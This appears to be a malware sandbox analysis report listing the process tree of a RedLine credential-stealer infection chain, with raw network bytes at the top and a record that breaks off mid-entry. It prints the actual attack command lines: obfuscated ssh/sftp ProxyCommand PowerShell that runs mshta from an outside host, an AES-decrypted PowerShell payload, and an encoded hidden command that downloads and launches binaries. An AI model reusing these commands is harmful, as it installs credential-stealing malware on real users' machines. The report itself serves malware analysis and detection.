2024-12-17 07:38:40 UTC	1369	IN	Data Raw: dd dc dc cc dc dc dc 2c dd dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc 1c f2 b5 b8 bd a8 bd dc dc dc cc dc dc dc dc de dc dc cc dc dc dc dc de dc dc dc dc dc dc dc dc dc dc dc dc dc 9c dc dc 1c f2 a8 b0 af dc dc dc dc dc cc dc dc dc cc de dc dc cc dc dc dc cc de dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc 1c f2 ae b8 bd a8 bd dc dc dc cc dc dc dc fc de dc dc cc dc dc dc fc de dc dc dc dc dc dc dc dc dc dc dc dc dc 9c dc dc 8c f2 ae b9 b0 b3 bf dc dc dc ec dc dc dc ec de dc dc ec dc dc dc ec de dc dc dc dc dc dc dc dc dc dc dc dc dc 9c dc dc 8c f2 ae af ae bf dc dc dc dc fc dc dc dc bc de dc dc fc dc dc dc bc de dc dc dc dc dc dc dc dc dc dc dc dc dc 9c dc dc 8c dc dc dc dc dc dc dc dc dc dc dc dc dc 5c de dc dc dc dc dc dc c2 de dc dc dc dc dc dc Data Ascii: ,\
2024-12-17 07:38:40 UTC	1369	IN	Data Raw: dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc Data Ascii:
2024-12-17 07:38:40 UTC	1369	IN	Data Raw: dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc dc Data Ascii:
2024-12-17 07:38:40 UTC	1369	IN	Data Raw: f9 2c dd 9e dc 57 1c 23 f9 b0 dd 9e dc 57 1c 23 f9 b4 dd 9e dc 57 1c 23 f9 b8 dd 9e dc 57 1c 23 f9 bc dd 9e dc 57 1c 8f 5f 18 60 67 d6 dc dc dc 88 34 85 23 23 23 2a 98 f8 f0 dd a8 d9 d3 6b 80 f8 ec 57 1f 5f 18 98 87 1f 57 1c 23 f9 80 dd 9e dc 57 1c 23 f9 84 dd 9e dc 57 1c 23 f9 88 dd 9e dc 57 1c 23 f9 8c dd 9e dc 57 1c 23 f9 90 dd 9e dc 57 1c 23 f9 94 dd 9e dc 57 1c 23 f9 98 dd 9e dc 57 1c 23 f9 9c dd 9e dc 57 1c 8f 5f 18 28 67 34 29 9d dc 5f e7 dc a9 85 b4 98 da dc dc b6 dc 34 7a 23 23 23 55 98 f8 d4 5f a0 f8 d4 dc a9 db ef 1c 55 d8 f8 37 8c 57 98 f8 d4 57 c9 38 29 9d dc 55 cc 57 98 f8 d4 7f 38 29 9d dc ef 1c 57 0c df 0e 57 90 f8 d4 51 88 0d d8 55 88 f8 d8 57 88 f8 d8 57 d7 55 d6 57 88 f8 d8 55 cf 9c 5f 24 b8 a9 00 57 df 55 98 f8 d8 57 98 f8 d8 57 dc 55 Data Ascii: ,W#W#W#W#W_`g4###*kW_W#W#W#W#W#W#W#W#W_(g4)_4z###U_U7WW8)UW8)WWQUWWUWU_$WUWWU

Target ID:	0
Start time:	02:38:15
Start date:	17/12/2024
Path:	C:\Windows\System32\OpenSSH\sftp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\OpenSSH\sftp.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" .
Imagebase:	0x7ff71f6e0000
File size:	374'272 bytes
MD5 hash:	72C41AA478CA868F95AD0936AF65818A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:38:15
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:38:15
Start date:	17/12/2024
Path:	C:\Windows\System32\OpenSSH\ssh.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp
Imagebase:	0x7ff7849a0000
File size:	946'176 bytes
MD5 hash:	C05426E6F6DFB30FB78FBA874A2FF7DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:38:15
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:38:17
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/3VKKE.mp4"
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:38:18
Start date:	17/12/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/3VKKE.mp4
Imagebase:	0x7ff6cda60000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:38:21
Start date:	17/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:38:22
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wrdZ($UvhG){return -split ($UvhG -replace '..', '0x$& ')};$ERHgk = wrdZ('ECA586FB867E54D080F88AB849BFB94F298E9D4D174F6B1F2F81610C3540C56191E34FB7B2DF87630478E180DACA97337CF338C5F0549579E18CC1A49A1339F9691FAE2EDAAC0D6E2AB4913030D45E7F9C40731A7B0ED45F438D15D573AB5E4816A3D8CA82DAA342D630EDB6E24E85F4D05E0447A728444A18214CD35DB1FD5C4C677BF1EB6DD62A0D4B42A5F996D056A8C58BF2B2ADC007CA0004F35EEDF7DB06CC47C0E8175257375360952646DDCE12F86A389A2FB4F08F04DF71ABBD10CA19394807E45AE262B4CF2BD880666BE9808038992E086339CA69F730462BD5BA268BEA9591B45C3FDDC4B990452C3C5B083B1D8A99DB9D344BE7F259679F7994FBAA4E272654402905FEB107236FDE83FA247F6DFF5EE2DE2FBE984DE8D33A5077EC31D65DAE7AAC344DB18BADD0E59C3DC0A20AA1776387E75ED82F6F21E81D436D435FE7641490C8BB3BE615F9D76B1F8A1323001EC29CB1DC720A20647927291ABFCCFF409B1F94A878B0CDB0AFF68E11DAF8B2CCB95D3B395C11FB1D2F79673936E5F6AF545B019BFDE71CDAC1667709524F9244C6D8B3198F1F28C92F507AF233B70FD15099184E521AA3D1F4EB4613BE4CC9617FD5EE373CB05A7B164A2B6211387C494F7FC2F64FB4B0EEC11B39FFCC4E09EE10E96070192D4E0E2AD737B857A3BA8766EF8B454E4CC9BAE60331184407821C7F5A417DEBB95885CD929FAC64B5913D45E20BA92710C789EA36BC01ED629BAAEEFB8F420E9D966E4669DB7E1EE213C1001073B4FB67BB454BA80B0144D096E4FA221E9AB74FB2FDA2CBBA9C669EB50610B810047A6A75A1E41407350666C1B141836EA4FB3C9588111CE216EB2E451248C7008EA09561E08463428A981B69214151A19DD58483CB4A07DA879953AA3FDBF8EC16A79ACD16FBF54B34E405FCE7D15727908982C71DB4EC3160579745FCBC610756535558573F49618C7606881E9C8F026001D9C1C40FD2462CC1EC3DCF620D160F23D6F789F8CAA4EE9835FD65AA1D0E0278809DE0D85C1295E58C782AAFF7016B75C2FBB65FE1F73E7B038C89BAA57C32930D22EE8C71A06F4A2C738995833A10226ECDFB07ECD5F6DA31617797E009FA791AB33D9189A3A8E44428EFC9D7C6FAC3474FD38038FE910BBB036CFF902B287315F807FAAA06AED95210DDE82DAEAC0A523D871AE53C0EF75EF61B9A57F8F33A81ABD5D297C8FA835397595E7202A8E9007FFC7EDE814D001B798D89293879C641BE0707A91665E5503FECF99138AC09675DB1C070F4CF90193587A5FFC1CEE76401544370EB81704BA787C0CD04C9585C45A98FE309B624E2A8DF58992BFB2E28E05D3E083F40D7259170B815F21C934D9A6B716FB374544D200AC2F51F83FF6015BF31FAF855ACD6F94C4EDCFFE1B1B1E84CD0DCE3476BE438811875890C244AF355F5A99D60D3FE596651A7FCE949EF11B75A3E47270440D77D7293E40B99F248B7EA50AE844851B9FCECC2A42A543848822154E0BDE72E753A37ABBC37D5A523E44824FDECB7EA3DA94AE0BC489AFB57E7FF8B9D330E6B6CF749C38703F35FBB8C7524C1CC772CB6E97F52B9A303F765EEA1CF88781CF03DBAF4E05C5E83D04900C62AE76C9060D2EF02C6358A9C35D3C5CADDA4513FE8720161EE8D258C9D8738089620A44FDD02266B9393340D2A4D6DF53670CE0EAC8ADF596CBD6821F99D9AA7D32C9C1C8CDD6A112CF9684123E95FA54979737993CA2ED54A8E4E7B526955F3B82D4D1180DCF858A68E630366BAE559198412C920E3DF514DC1275386D42B0CF7D7800F9A9C56DF30AC55BB715221A65AC5F1B6C047475AF5D327C3E5F8421DC5507C9898E1CA30BC70D6ED81C7FBE88DC6473A1B361F63E277C1B83D0BA47D9D3A44BB1ED147D9E3D1391B4E0C9728E31F4600C8F8CDC7EA1BB362F215217B57B713C7F2C9B60FFBB1ABFF32654C427DAA0BD39D0753919D0F4F7B47FF923BD6168030D3B1CA13A0BC8AE221E2EFF957C435C969E04687A2C6C904546412E258E176D90F2AB2610D646A04013170A7E91553C26CB19E387AC2878C25187D9EC33EAC057D9448A0E50970D725F4AE31251B623B0B5A305DCAC452B7DA140F210FCC343D9FBD0EC51684312B709C31444AACFA23CFEAB3AE4AC1C6A879FE470B6416CEBB2F178AE84573C53893E06FC0AE6ECFC03F4C90F076720D4B810C012F09743B0BF027AFB2E867A6E3F73245EFE09DF5DCE804610D56D01DC824BF35F45CB7EDA5CD64F311A3B61FE521DA848A9CAB24E748591B220CEEFE7D9A36BBC1E5F24BF30F5CE52169CB97FAAE75575413CD60AE32FC1A6CC27C9980085CDA2F8C27D87CA1FF168195891536630388FFCD9C372990E8DB3035DB41B4F05649EDF35A78D27B65607BED7BF574919DED94333AA2853E49B351986E8299E7F8CB9EB1BB9794F03018AB908F931503BFEACE65F8679C093B2329E97B124254753C5C544C2750918D3F7D58E7556F9CDBE22D8EF4E087662E02BE99BDC7FEBE9725EC81D8FFEAB94C47300957B76133483633F4C417A4E36BE4BA53126A232E102EAE8CFBF4D04771B0B17331D769C9868C1BA21D79B62C6156B711C4DA2AE26EA3AC3AA1234E4D38FA65E44011BF70B4B8164D5F6803D08C5EF5B31BAAF7604E5ED04E78508A96C33DC3492F83F453FD1E760E7AF8934042152026B411DA5D050D3FD8CCD624AC5D4F6ACF0304BA03E7EA0E9E334B99AA805A7D4CD723334E8FF067C594EBB0E5C6E10C35DFAEDF91E5435A572165C3928CD8C7A89E4B018B67367579AC884AE72CC15C6507DD451FA613ABABFB1BEB49E6524CDCFC6DFC638DBC730BE50DE2F5E34D5F663DF4F56A2742C0A7FF04F9AD3FEE4DF08653E02F23B90B05B4B5E605FD41CFF536CB679848F513DD2D7927CE2E9E159E7FE452FD3CA59EA983EB5045FD03D30192780BC10C8AC0A57B49F8DC235CB74504E0E301B1C0E41DABA9A975A56696157984A6AD4A76AE095BFD4669183463DD41D43595B0446410F94FD2B2C020C103C2A0BAB641ABF60DFAEBDE549EF5A220BCE98226A0CE20B9225E1385E98ADFBA9CF1850D7F113DB328BE5E3C9340A2A952E676B9BEC2B6120988762635F70A05D2B777638385AD00F32DE0C206E562B0C2195FC2AD184ED4D67B68C93D7210AA4A20118614889E0786C0E9C0FC28EF8F771F6320C8D924C92FBFA72E2F719D17C1A309B8EB56AA40BBF5DFC35CAC2B40719ADE0D17B5052200F6EF4BB1C7B93D9C0944E8005D65AC117C7B894D5EEC87F17109C1949668FFDC7A4CA6C940B88918C3DE04F4A4CC43DE2D7131D26A49125B2C46CFCEE8AF68EAAEC1AEF8D3C8C1BDD83E8126909DCB7CCEB105D450824ACCDB5C4E8A86CD12F1D1AF6BB83D6F2EAD63BB04655509F1109DCB3566BF352891E4BD45C18681F6E05F6BCB9621FA298C87220A4C95FD32B57EB11E136B0F2B1EA66CDA02C81C9506E52D8DDB49AAEB7BF8338DC00C174FC70E63AC9A2DB86B995EFD4E27B06E95285A47557301FBFA59F163C94BC198DBC2E9A3AABEDDAB1968AD63CC18FBBD99FCC92C4B66F67B13E361C60F5DE165F887A5FD810B1FC0D81F20D34B77231A785EA4F3C2FABF388D5F425D0B49D28D797587AD2A76BB48EBCAA42A261893ED1243B7B8B39A642FB81DE7693B76CABA8D573C7CDB16F821D88C0A82B778C8B6A7041CFB6AE7518394091122A37BA9A348655774955AC96E899B16C45DD9F498BF83331A78A07D675E0F617E2302DD1BE067435EF00E8CE909F6997221E215908093F119F9E973D693875506C00344360E305434E218FDBB34B36412FEB62E4B519613672B8D0572BAD09FF488FB9CAE9A7C1FE5D3FB245FB243F1502CBA5B42C3CE66FC0C6F92DA0F28B9FC0925F12D5DF11D10D4F3E965D5025E2246B6E0B2A80B2B0B9780F6AD69813C90E900DD592BF5CD589A648E97917D567418BB6C536052204E09FA189445CF4D138D886258BCA2C85028723BA69A14D89DC4C5FE6415BA90A1387A444AA3A25EBEC36D5F01425A866E96BBA5707D665D69B73587240C5BB26999293879135BC569AB94BC5D8B8171BDAFD8ACE9403BC1BE80B00859E9B66A116F1F4F1F61E999A2910C8BA17673DD98B2B1C5531DC9E5BE8CD421CC04F219A1A0CB2BC4FA49CC317D1110D35CA05E5ABE31F2A39C7B38F6E5480485B0');$fkxI=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wrdZ('71747743676D42704F54615370636865')),[byte[]]::new(16)).TransformFinalBlock($ERHgk,0,$ERHgk.Length)); & $fkxI.Substring(0,3) $fkxI.Substring(433)
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:38:22
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:38:23
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAYQBKAHcANwA7ACQAcwBXAGYAMgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAawBOAHIAMwA7ACQAdgBQAGIAOQA9ACIAaAB0AHQAcABzADoALwAvAGMAbgBkAGUAZgAxAC4AZwByAGUAZQBuAC0AcABhAHQAaAB3AGEAeQBzAC4AcwBoAG8AcAAvAGEAcABpAC8AdQB6AC8ANwA1ADUAMgA5ADcAMwA2ADUAMAAvAHUALgBiAGkAbgAiADsAJAB4AFEAZAA1AD0AIgBoAHQAdABwAHMAOgAvAC8AYwBuAGQAZQBmADEALgBnAHIAZQBlAG4ALQBwAGEAdABoAHcAYQB5AHMALgBzAGgAbwBwAC8AYQBwAGkALwB1AHoALwA3ADUANQAyADkANwAzADYANQAwAC8AbgBuAG4ALgBiAGkAbgAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdgBQAGIAOQAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABIAHQANgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4AFEAZAA1ACAALQBPAHUAdABGAGkAbABlACAAJABzAFcAZgAyACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABIAHQANgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHMAVwBmADIAOwAmACAAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgAKAAnAGUAJwArACcAeABpACcAKwAnAHQAJwApACAALQBqAG8AaQBuACAAJwAnACkAKQApAA==
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:38:23
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:38:26
Start date:	17/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ref095vq842r70_3rd_party_authorisation_form.pdf"
Imagebase:	0x7ff688b00000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	02:38:27
Start date:	17/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6e9af0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	02:38:27
Start date:	17/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,9604478035381720578,9467704426141136404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff6e9af0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	02:38:41
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\71532689\updater.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\71532689\updater.exe" C:\Users\user\AppData\Local\Temp\71532689\XPoaTdYD.bin
Imagebase:	0x310000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1674485682.0000000004508000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000002.1674485682.0000000004508000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.1667401660.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000003.1667401660.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.1667521977.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000003.1667521977.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:38:48
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0x4e0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	02:38:59
Start date:	17/12/2024
Path:	C:\ehcfdbh\AutoIt3.exe
Wow64 process (32bit):	true
Commandline:	"C:\ehcfdbh\AutoIt3.exe" C:\ehcfdbh\bhcbhah.a3x
Imagebase:	0xc80000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.1833241977.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000003.1833241977.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1840944996.00000000041B8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.1840944996.00000000041B8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.1833497211.0000000004960000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000003.1833497211.0000000004960000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:39:04
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0x1f0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:39:04
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
